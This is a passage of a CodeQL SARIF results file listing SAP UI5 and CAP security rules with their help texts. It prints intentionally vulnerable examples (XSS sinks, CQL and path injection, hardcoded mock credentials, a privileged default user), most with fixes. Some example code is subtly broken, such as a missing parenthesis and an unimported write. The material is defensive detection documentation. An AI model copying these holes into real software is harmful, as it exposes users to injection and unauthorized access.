controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n    return Control.extend(\"vulnerable.control.xss\", {\n        metadata: { properties: { text: { type: \"string\" } } },\n        renderer: {\n            apiVersion: 2,\n            render: function (oRm, oControl) {\n                oRm.openStart(\"div\", oControl);\n                oRm.unsafeHtml(oControl.getText()); // sink\n                oRm.close(\"div\");\n            }\n        }\n    });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n    return Control.extend(\"vulnerable.control.xss\", {\n        metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n        renderer: {\n            apiVersion: 2,\n            render: function (oRm, oControl) {\n                oRm.openStart(\"div\", oControl);\n                oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n                oRm.close(\"div\");\n            }\n        }\n    });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n<sap.ui.core.mvc.View controllerName=\"vulnerable.controller.app\">\n  <sap.m.Input value=\"{/input}\" />\t <!-- XSS Source -->\n  <sap.ui.core.HTML content=\"{/input}\"/> <!-- XSS Sink -->\n</sap.ui.core.mvc.View>\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n  function (Controller, JSONModel) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onInit: function () {\n        var oData = { input: null };\n        var oModel = new JSONModel(oData);\n        this.getView().setModel(oModel);\n      },\n    });\n  },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n<sap.ui.core.mvc.View controllerName=\"vulnerable.controller.app\">\n  <sap.m.Input value=\"{/input}\" />\n  <sap.ui.core.HTML content=\"{/input}\" sanitizeContent=\"true\" />\n</sap.ui.core.mvc.View>\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Client-side cross-site scripting\n\nReceiving text from the user, most notably through a control, and rendering it as HTML in another control can lead to a cross-site scripting vulnerability.\n\n## Recommendation\n\n### Preventing XSS Involving User Defined Control\n\nIf the XSS attack vector includes a user-defined control, then we can mitigate the issue by sanitizing the user-provided input in the implementation of the control:\n- Where possible, define the property type to something other than `string` or `any`. If a value should be used, then opt for the `enum` type which only allows a predefined set of strings.\n- Use escaping functions in `sap.base.security`. Relevant sanitizers include `encodeXML` and `encodeHTML`.\n- When using API  with `apiVersion: 2` (Semantic Rendering), do not use `RenderManager.unsafeHtml` unless the control property `sanitizeContent` is set to `true`.\n- When using the now-deprecated older API with `RenderManager.write` or `RenderManager.writeAttribute`, use their respective counterparts `RenderManager.writeEscaped` and `RenderManager.writeAttributeEscaped` which sanitizes their rendered contents.\n\n### Preventing XSS Not Involving User Defined Control\n\nAn XSS attack vector can still exist even when no user-defined control is used. In this case, a model property or a control property act as an intermediate step when external data is passed in.\nIn this case, the UI5 application should not use the property as is, but should sanitize the contents before reading it. Such sanitization can take place in the controller or in the view declaration using expression bindings.\n\n## Example\n\n### Custom Control with Custom Rendering Method\n\nThis custom control `vulnerable.control.xss` calls `unsafeHtml` on a given `RenderManager` instance in its static renderer function. Since its `text` property is an unrestricted string type, it can point to a string with contents that can be interpreted as HTML. If it is the case, `unsafeHtml` will render the string, running a possibly embedded JavaScript code in it.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\"], function (Control) {\n    return Control.extend(\"vulnerable.control.xss\", {\n        metadata: { properties: { text: { type: \"string\" } } },\n        renderer: {\n            apiVersion: 2,\n            render: function (oRm, oControl) {\n                oRm.openStart(\"div\", oControl);\n                oRm.unsafeHtml(oControl.getText()); // sink\n                oRm.close(\"div\");\n            }\n        }\n    });\n})\n```\n\nThis is the same custom control without the possibility of XSS using several means of sanitization: The property `text` is enforced to a non-string type, hence disallows unrestricted strings (This is espcially applicable if the expected input is a number anyways). Also, the `sap.base.security.encodeXML` function is used to escape HTML control characters.\n\n```javascript\nsap.ui.define([\"sap/ui/core/Control\", \"sap/base/security/encodeXML\"], function (Control, encodeXML) {\n    return Control.extend(\"vulnerable.control.xss\", {\n        metadata: { properties: { text: { type: \"int\" } } }, // constrain the type\n        renderer: {\n            apiVersion: 2,\n            render: function (oRm, oControl) {\n                oRm.openStart(\"div\", oControl);\n                oRm.unsafeHtml(encodeXML(oControl.getText()); // encode using security functions\n                oRm.close(\"div\");\n            }\n        }\n    });\n})\n```\n\n### Library Control\n\nThis example contains only library controls that are not user-defined. The untrusted user input flows from `sap.m.Input` and directly flows out via `sap.ui.core.HTML` through the model property `input` as declared in the `onInit` method of the controller.\n\n``` xml\n<sap.ui.core.mvc.View controllerName=\"vulnerable.controller.app\">\n  <sap.m.Input value=\"{/input}\" />\t <!-- XSS Source -->\n  <sap.ui.core.HTML content=\"{/input}\"/> <!-- XSS Sink -->\n</sap.ui.core.mvc.View>\n```\n\n``` javascript\nsap.ui.define([\"sap/ui/core/mvc/Controller\", \"sap/ui/model/json/JSONModel\"],\n  function (Controller, JSONModel) {\n    return Controller.extend(\"vulnerable.controller.app\", {\n      onInit: function () {\n        var oData = { input: null };\n        var oModel = new JSONModel(oData);\n        this.getView().setModel(oModel);\n      },\n    });\n  },\n);\n```\n\nThe issue can be resolved by setting the `HTML` control's `sanitizeContent` attribute to true.\n\n``` xml\n<sap.ui.core.mvc.View controllerName=\"vulnerable.controller.app\">\n  <sap.m.Input value=\"{/input}\" />\n  <sap.ui.core.HTML content=\"{/input}\" sanitizeContent=\"true\" />\n</sap.ui.core.mvc.View>\n```\n\n## References\n\n- OWASP: [DOM Based XSS](https://owasp.org/www-community/attacks/DOM_Based_XSS).\n- SAP UI5 Documentation: [Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/91f0bd316f4d1014b6dd926db0e91070.html) in UI5.\n- SAP UI5 Documentation: [Prevention of Cross-site Scripting](https://sapui5.hana.ondemand.com/sdk/#/topic/4de64e2e191f4a7297d4fd2d1e233a2d.html) in UI5.\n- SAP UI5 Documentation: [API Documentation of sap.ui.core.RenderManager](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.RenderManager).\n- SAP UI5 Documentation: [Defining Control Properties](https://sapui5.hana.ondemand.com/sdk/#/topic/ac56d92162ed47ff858fdf1ce26c18c4.html).\n- SAP UI5 Documentation: [Expression Binding](https://sapui5.hana.ondemand.com/sdk/#/topic/daf6852a04b44d118963968a1239d2c0).\n- SAP UI5 API Reference: [`sap.ui.core.HTML`](https://sapui5.hana.ondemand.com/sdk/#/api/sap.ui.core.HTML%23methods/setSanitizeContent).\n- Common Weakness Enumeration: [CWE-79](https://cwe.mitre.org/data/definitions/79.html).\n- Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","external/cwe/cwe-079","external/cwe/cwe-116"],"description":"Writing user input directly to a UI5 View allows for\n              a cross-site scripting vulnerability.","id":"js/ui5-xss","kind":"path-problem","name":"UI5 Client-side cross-site scripting","precision":"high","problem.severity":"error","security-severity":"7.8"}}],"locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/javascript/frameworks/ui5/src/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-ui5-models","semanticVersion":"2.3.0","locations":[{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/.github/codeql/extensions/javascript/frameworks/ui5/ext/ext/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///home/runner/work/codeql-sap-js/codeql-sap-js/.github/codeql/extensions/javascript/frameworks/ui5/ext/ext/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}],"properties":{"isCodeQLModelPack":true}},{"name":"codeql/javascript-all","semanticVersion":"2.6.18+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-all/2.6.18/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/javascript-all/2.6.18/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"codeql/threat-models","semanticVersion":"1.0.38+28b6aa8616a393ebb45186e3ba4df004a0f3ef4e","locations":[{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/threat-models/1.0.38/","description":{"text":"The QL pack root directory."},"properties":{"tags":["CodeQL/LocalPackRoot"]}},{"uri":"file:///opt/hostedtoolcache/CodeQL/2.23.8/x64/codeql/qlpacks/codeql/threat-models/1.0.38/qlpack.yml","description":{"text":"The QL pack definition file."},"properties":{"tags":["CodeQL/LocalPackDefinitionFile"]}}]},{"name":"advanced-security/javascript-sap-cap-queries","semanticVersion":"2.3.0+beda8c5e77ff63cd984068207702212afd00b7f4","rules":[{"id":"js/cap-log-injection","name":"js/cap-log-injection","shortDescription":{"text":"CAP Log injection"},"fullDescription":{"text":"Building log entries from user-controlled sources is vulnerable to insertion of forged log entries by a malicious user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging.  It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n  this.on ('submitOrder', async req => {\n    const {book,quantity} = req.data\n    const LOG = cds.log(\"nodejs\");\n    LOG.info(\"test\" + book); // Log injection alert\n  })\n\n  return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n","markdown":"# CAP Log Injection\n\nIf unsanitized user input is written to a log entry using the CAP Node.js logging API, a malicious user may be able to forge new log entries.\n\nCAP Node.js offers a CLRF-safe logging API that should be used for application log entries that are logged as plaintext. If the entry is interpreted as HTML, then arbitrary HTML code my be included to forge log entries.\n\n## Recommendation\n\nCAP applications need to care for escaping user data that is used as input parameter for application logging.  It's recommended to make use of an existing Encoder such as OWASP ESAPI.\n\n## Examples\n\nThis CAP service directly logs what the user submitted via the `req` request.\n\n``` javascript\nimport cds from '@sap/cds'\nconst { Books } = cds.entities ('sap.capire.bookshop')\n\nclass SampleVulnService extends cds.ApplicationService { init(){\n  this.on ('submitOrder', async req => {\n    const {book,quantity} = req.data\n    const LOG = cds.log(\"nodejs\");\n    LOG.info(\"test\" + book); // Log injection alert\n  })\n\n  return super.init()\n}}\n```\n\n## References\n\n- OWASP: [Log Injection](https://owasp.org/www-community/attacks/Log_Injection).\n- OWASP: [Log Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/Logging_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n"},"properties":{"tags":["security"],"description":"Building log entries from user-controlled sources is vulnerable to\n              insertion of forged log entries by a malicious user.","id":"js/cap-log-injection","kind":"path-problem","name":"CAP Log injection","precision":"medium","problem.severity":"error","security-severity":"6.1"}},{"id":"js/cap-sql-injection","name":"js/cap-sql-injection","shortDescription":{"text":"CQL query built from user-controlled sources"},"fullDescription":{"text":"Building a CQL query from user-controlled sources is vulnerable to insertion of malicious code by the user."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = <from user input>\nconst column = <from user input>\nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injectionn).\n- OWASP: [SQL Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n","markdown":"# CQL query built from user-controlled sources\n\nIf a database query is built from user-provided data without sufficient sanitization, a malicious user may be able to run malicious database queries.\n\n## Recommendation\n\nCAP's intrinsic data querying engine is immune with regards to SQL injections that are introduced by query parameter values that are derived from malicious user input. CQL statements are transformed into prepared statements that are executed in SQL databases such as SAP HANA. \nInjections are still possible even via CQL when the query structure (e.g. target entity, columns etc.) is based on user input.\n\n## Examples\n\nThis CAP application uses user submitted input as entity and column in a CQL query without any validation.\n\n``` javascript\nconst entity = <from user input>\nconst column = <from user input>\nSELECT.from(entity).columns(column)\n```\n\n## References\n\n- OWASP: [SQL Injection](https://owasp.org/www-community/attacks/SQL_Injectionn).\n- OWASP: [SQL Injection Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html).\n- SAP CAPire Documentation: [Security Aspects](https://cap.cloud.sap/docs/guides/security/aspects#common-injection-attacks).\n"},"properties":{"tags":["security"],"description":"Building a CQL query from user-controlled sources is vulnerable to insertion of\n              malicious code by the user.","id":"js/cap-sql-injection","kind":"path-problem","name":"CQL query built from user-controlled sources","precision":"high","problem.severity":"error","security-severity":"8.8"}},{"id":"js/cap-path-injection","name":"js/cap-path-injection","shortDescription":{"text":"Use of user controlled input in CAP CDS file system utilities"},"fullDescription":{"text":"Using unchecked user controlled values can allow an attacker to affect paths constructed and accessed in the filesystem."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# CAP CDS Utils used with user-controlled sources\n\nIf a path is constructed from user-provided input without sufficient sanitization, a malicious user may be able to manipulate the contents of the filesystem without proper authorization.\n\nAdditionally if user-provided input is used to create file contents this can also result in a malicious user manipulating the filesystem in an unchecked way.\n\n## Recommendation\n\nCAP applications using CDS Utils should not use user-provided input without sanitization.\n\nThe sanitization stragety can vary depending on what types of paths are satisfactory as user-provided input. A simple approach to sanitization is to check user-provided input against an allow list. Other potential approaches include checking components of paths or normalizing them to make sure that the path does not escape the expected root folder. \n\nNormalization techniques should be carefully considered and simple naive replacement strategies will not be sufficient, for example replacing any match of a parent directory reference (`../`) in the sample `.../...//` will still result in the path `../` being used which could escape the intended directory.\n\n## Examples\n\nThis CAP service directly uses user-provided input to construct a path.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst { rm } = cds.utils\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n\n    init() {\n        this.on(\"send1\", async (req) => {\n            let userinput = req.data\n            await rm(userinput, 'db', 'data') // Path injection alert\n        }\n    }\n}\n```\n\nThis CAP service directly uses user-provided input to add content to a file.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst { rm } = cds.utils\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n  init() {\n    this.on(\"send1\", async (req) => {\n      let userinput = req.data\n      await write(userinput).to('db/data') // Path injection alert\n\n      // GOOD: the path can not be controlled by an attacker\n      let allowedDirectories = [\n        'this-is-a-safe-directory'\n      ];\n      if (allowedDirectories.includes(userinput)) {\n        await rm(userinput) // sanitized - No Path injection alert\n      }\n    }\n  }\n}\n```\n\n## References\n\n- OWASP 2021: [Injection](https://owasp.org/Top10/A03_2021-Injection/).\n- SAP CAP CDS Utils : [Documentation](https://cap.cloud.sap/docs/node.js/cds-utils).\n- Common Weakness Enumeration: [CWE-020](https://cwe.mitre.org/data/definitions/20.html).\n- Common Weakness Enumeration: [CWE-022](https://cwe.mitre.org/data/definitions/22.html).\n","markdown":"# CAP CDS Utils used with user-controlled sources\n\nIf a path is constructed from user-provided input without sufficient sanitization, a malicious user may be able to manipulate the contents of the filesystem without proper authorization.\n\nAdditionally if user-provided input is used to create file contents this can also result in a malicious user manipulating the filesystem in an unchecked way.\n\n## Recommendation\n\nCAP applications using CDS Utils should not use user-provided input without sanitization.\n\nThe sanitization stragety can vary depending on what types of paths are satisfactory as user-provided input. A simple approach to sanitization is to check user-provided input against an allow list. Other potential approaches include checking components of paths or normalizing them to make sure that the path does not escape the expected root folder. \n\nNormalization techniques should be carefully considered and simple naive replacement strategies will not be sufficient, for example replacing any match of a parent directory reference (`../`) in the sample `.../...//` will still result in the path `../` being used which could escape the intended directory.\n\n## Examples\n\nThis CAP service directly uses user-provided input to construct a path.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst { rm } = cds.utils\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n\n    init() {\n        this.on(\"send1\", async (req) => {\n            let userinput = req.data\n            await rm(userinput, 'db', 'data') // Path injection alert\n        }\n    }\n}\n```\n\nThis CAP service directly uses user-provided input to add content to a file.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst { rm } = cds.utils\n\nmodule.exports = class Service1 extends cds.ApplicationService {\n  init() {\n    this.on(\"send1\", async (req) => {\n      let userinput = req.data\n      await write(userinput).to('db/data') // Path injection alert\n\n      // GOOD: the path can not be controlled by an attacker\n      let allowedDirectories = [\n        'this-is-a-safe-directory'\n      ];\n      if (allowedDirectories.includes(userinput)) {\n        await rm(userinput) // sanitized - No Path injection alert\n      }\n    }\n  }\n}\n```\n\n## References\n\n- OWASP 2021: [Injection](https://owasp.org/Top10/A03_2021-Injection/).\n- SAP CAP CDS Utils : [Documentation](https://cap.cloud.sap/docs/node.js/cds-utils).\n- Common Weakness Enumeration: [CWE-020](https://cwe.mitre.org/data/definitions/20.html).\n- Common Weakness Enumeration: [CWE-022](https://cwe.mitre.org/data/definitions/22.html).\n"},"properties":{"tags":["security","external/cwe/cwe-020","external/cwe/cwe-022"],"description":"Using unchecked user controlled values can allow an\n              attacker to affect paths constructed and accessed in\n              the filesystem.","id":"js/cap-path-injection","kind":"path-problem","name":"Use of user controlled input in CAP CDS file system utilities","precision":"medium","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/cap-non-prod-auth-strategy","name":"js/cap-non-prod-auth-strategy","shortDescription":{"text":"Non-production authentication strategy used"},"fullDescription":{"text":"Using non-production authentication strategies can lead to unwanted authentication behavior in production."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Non-Production Authentication Strategy Used without Profiles\n\nUsing a non-production authentication strategy without setting up a distinct profile for development may pose allow unintended authentication and/or authorization if the application is deployed into production.\n\n## Recommendation\n\n### Isolate the use of development-level strategies to a development profile\n\nUse separate profiles for development and deployment and select one as needed. In this way, properties including authentication strategies can be substituted by changing a single command line option: `--profile`. For example, having the following section in the application's `package.json` states that the `\"dummy\"` authentication strategy must be used while `\"xsuaa\"`, a production-grade strategy, should be used when deployed:\n\n``` json\n{\n  \"requires\": {\n    \"[dev]\": {\n      \"auth\": \"dummy\"\n    },\n    \"[deploy]\": {\n      \"auth\": \"xsuaa\"\n    }\n  }\n}\n```\n\nThe application can be now run in different modes depending on the `--profile` command line option:\n\n``` shell\n$ cds serve --profile dev    # Runs the application in development profile with strategy \"dummy\"\n$ cds serve --profile deploy # Runs the application in development profile with strategy \"xsuaa\"\n```\n\n## Example\n\nThe following CAP application states that it uses `\"basic\"` authentication strategy along with mocked credentials. Using the pair of username and password, an attacker can gain access to certain assets by signing in to the application.\n\n``` json\n{\n  \"cds\": {\n    \"requires\": {\n      \"auth\": {\n        \"kind\": \"basic\",\n        \"users\": {\n          \"JohnDoe\": {\n            \"password\": \"JohnDoesPassword\",\n            \"roles\": [\"JohnDoesRole\"],\n            \"attr\": {}\n          },\n          \"JaneDoe\": {\n            \"password\": \"JaneDoesPassword\",\n            \"roles\": [\"JaneDoesRole\"],\n            \"attr\": {}\n          }\n        }\n      }\n    }\n  }\n}\n```\n\n## References\n\n- Common Weakness Enumeration: [CWE-288](https://cwe.mitre.org/data/definitions/288.html).\n- Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n- SAP CAPire Documentation: [Authentication Strategies](https://cap.cloud.sap/docs/node.js/authentication#strategies).\n","markdown":"# Non-Production Authentication Strategy Used without Profiles\n\nUsing a non-production authentication strategy without setting up a distinct profile for development may pose allow unintended authentication and/or authorization if the application is deployed into production.\n\n## Recommendation\n\n### Isolate the use of development-level strategies to a development profile\n\nUse separate profiles for development and deployment and select one as needed. In this way, properties including authentication strategies can be substituted by changing a single command line option: `--profile`. For example, having the following section in the application's `package.json` states that the `\"dummy\"` authentication strategy must be used while `\"xsuaa\"`, a production-grade strategy, should be used when deployed:\n\n``` json\n{\n  \"requires\": {\n    \"[dev]\": {\n      \"auth\": \"dummy\"\n    },\n    \"[deploy]\": {\n      \"auth\": \"xsuaa\"\n    }\n  }\n}\n```\n\nThe application can be now run in different modes depending on the `--profile` command line option:\n\n``` shell\n$ cds serve --profile dev    # Runs the application in development profile with strategy \"dummy\"\n$ cds serve --profile deploy # Runs the application in development profile with strategy \"xsuaa\"\n```\n\n## Example\n\nThe following CAP application states that it uses `\"basic\"` authentication strategy along with mocked credentials. Using the pair of username and password, an attacker can gain access to certain assets by signing in to the application.\n\n``` json\n{\n  \"cds\": {\n    \"requires\": {\n      \"auth\": {\n        \"kind\": \"basic\",\n        \"users\": {\n          \"JohnDoe\": {\n            \"password\": \"JohnDoesPassword\",\n            \"roles\": [\"JohnDoesRole\"],\n            \"attr\": {}\n          },\n          \"JaneDoe\": {\n            \"password\": \"JaneDoesPassword\",\n            \"roles\": [\"JaneDoesRole\"],\n            \"attr\": {}\n          }\n        }\n      }\n    }\n  }\n}\n```\n\n## References\n\n- Common Weakness Enumeration: [CWE-288](https://cwe.mitre.org/data/definitions/288.html).\n- Common Weakness Enumeration: [CWE-798](https://cwe.mitre.org/data/definitions/798.html).\n- SAP CAPire Documentation: [Authentication Strategies](https://cap.cloud.sap/docs/node.js/authentication#strategies).\n"},"properties":{"tags":["security"],"description":"Using non-production authentication strategies can lead to unwanted authentication behavior in production.","id":"js/cap-non-prod-auth-strategy","kind":"problem","name":"Non-production authentication strategy used","precision":"high","problem.severity":"warning","security-severity":"6"}},{"id":"js/cap-default-user-is-privileged","name":"js/cap-default-user-is-privileged","shortDescription":{"text":"Default user is privileged"},"fullDescription":{"text":"Overriding the default user to the privileged user allows for authentication bypass."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Default User is overwritten as privileged\n\nUsers that cannot be verified as authenticated are represented as `cds.User.default` internally. Setting this property to `cds.User.Privileged` may result in providing protected assets to unauthorized users.\n\n## Recommendation\n\n### Set up a development profile that uses non-production authentication\n\nOverwriting `cds.User.default` as `cds.User.Privileged` for testing purposes is not recommended as such code may easily slip through production.\n\nInstead, set up a development profile and opt in to use a non-production strategy such as `\"basic\"`, `\"dummy\"`, or `\"mocked\"` during its use. This can be done in the file `package.json` in the root folder of the CAP application:\n\n``` json\n{\n  \"requires\": {\n    \"[dev]\": {\n      \"auth\": \"dummy\"\n    }\n  }\n}\n```\n\nSetting `\"dummy\"` as the development authentication strategy has the effect of disabling `@requires` and `@restrict` annotations of CDS definitions that provides authorization. The application during development then can be run and tested with the `--profile dev` option.\n\n```shell\ncds serve --profile dev\n```\n\n## Example\n\nSetting `cds.User.default` to `cds.User.Privileged` may happen anywhere in the application. In the following example, the `server.js` file provides the top-level definition of a CAP application and overwrites the `default` user property with the `Privileged` class.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst app = require(\"express\")();\n\n/*\n * Antipattern: `cds.User.default` is overwritten to `cds.User.Privileged`\n */\ncds.User.default = cdsUser.Privileged;\n\ncds.serve(\"all\").in(app);\n```\n\n## References\n\n- SAP CAPire Documentation: [cds.User.default](https://cap.cloud.sap/docs/node.js/authentication#default-user).\n- SAP CAPire Documentation: [cds.User.Privileged](https://cap.cloud.sap/docs/node.js/authentication#privileged-user).\n- SAP CAPire Documentation: [Authentication Strategies](https://cap.cloud.sap/docs/node.js/authentication#strategies).\n- Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n","markdown":"# Default User is overwritten as privileged\n\nUsers that cannot be verified as authenticated are represented as `cds.User.default` internally. Setting this property to `cds.User.Privileged` may result in providing protected assets to unauthorized users.\n\n## Recommendation\n\n### Set up a development profile that uses non-production authentication\n\nOverwriting `cds.User.default` as `cds.User.Privileged` for testing purposes is not recommended as such code may easily slip through production.\n\nInstead, set up a development profile and opt in to use a non-production strategy such as `\"basic\"`, `\"dummy\"`, or `\"mocked\"` during its use. This can be done in the file `package.json` in the root folder of the CAP application:\n\n``` json\n{\n  \"requires\": {\n    \"[dev]\": {\n      \"auth\": \"dummy\"\n    }\n  }\n}\n```\n\nSetting `\"dummy\"` as the development authentication strategy has the effect of disabling `@requires` and `@restrict` annotations of CDS definitions that provides authorization. The application during development then can be run and tested with the `--profile dev` option.\n\n```shell\ncds serve --profile dev\n```\n\n## Example\n\nSetting `cds.User.default` to `cds.User.Privileged` may happen anywhere in the application. In the following example, the `server.js` file provides the top-level definition of a CAP application and overwrites the `default` user property with the `Privileged` class.\n\n``` javascript\nconst cds = require(\"@sap/cds\");\nconst app = require(\"express\")();\n\n/*\n * Antipattern: `cds.User.default` is overwritten to `cds.User.Privileged`\n */\ncds.User.default = cdsUser.Privileged;\n\ncds.serve(\"all\").in(app);\n```\n\n## References\n\n- SAP CAPire Documentation: [cds.User.default](https://cap.cloud.sap/docs/node.js/authentication#default-user).\n- SAP CAPire Documentation: [cds.User.Privileged](https://cap.cloud.sap/docs/node.js/authentication#privileged-user).\n- SAP CAPire Documentation: [Authentication Strategies](https://cap.cloud.sap/docs/node.js/authentication#strategies).\n- Common Weakness Enumeration: [CWE-250](https://cwe.mitre.org/data/definitions/250.html).\n"},"properties":{"tags":["security"],"description":"Overriding the default user to the privileged user allows for authentication bypass.","id":"js/cap-default-user-is-privileged","kind":"problem","name":"Default user is privileged","precision":"high","problem.severity":"error","security-severity":"6"}},{"id":"js/cap-unnecessarily-granted-privileged-access-rights","name":"js/cap-unnecessarily-granted-privileged-access-rights","shortDescription":{"text":"Access rights to an entity is unnecessarily elevated to privileged"},"fullDescription":{"text":"An entity requiring authorization is being accessed with privileged rights."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Access rights to an entity is unnecessarily elevated to privileged\n\nThe privileged user `cds.User.Privileged` is used to access an entity that requires authorization. If the application does not verify the actual user rights, it may expose protected entities to unauthorized users.\n\nThis is especially important when the accessed entity belongs to a remote service. By default, when using a production-grade authentication strategy all CAP endpoints are authenticated. However, if the entity is outside the application, there is no guarantee that the user is authenticated in the remote service.\n\n## Recommendations\n\n### Avoid using `cds.User.Privileged` when accessing an access-controlled entity\n\nAny entity that requires authorization should be accessed within the context of the authenticated user. When using a transaction, prefer using `cds.User` as the `user` 